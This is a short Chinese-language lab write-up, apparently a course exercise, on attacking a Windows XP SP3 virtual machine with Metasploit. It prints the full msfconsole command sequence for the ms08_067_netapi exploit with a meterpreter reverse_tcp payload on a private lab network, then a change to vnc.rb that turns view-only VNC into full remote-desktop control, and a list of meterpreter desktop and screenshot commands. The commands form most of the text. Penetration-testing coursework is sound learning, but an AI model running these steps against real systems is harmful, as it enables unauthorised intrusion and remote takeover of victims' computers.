赞
踩
分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。
在msfconsole中使用命令:
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.161.130
set LHOST 192.168.161.128
set TARGET 34
exploit
得到会话后使用命令run vnc
获得靶机桌面。结果如下:
由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。
在目录/usr/share/metasploit-framework/scripts/meterpreter/
下找到vnc.rb
文件,如下:
在该文件中找到pay
的声明位置,在其后添加pay.datastore['ViewOnly'] = false
后即可对远程桌面进行控制。
enumdesktops #查看可用的桌面
getdesktop #获取当前 meterpreter 关联的桌面
set_desktop #设置 meterpreter 关联的桌面 h 查看帮助
screenshot #截屏
use espia #或者使用 espia 模块截屏 然后输入 screengrab
run vnc #使用使用vnc远程桌面连接
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。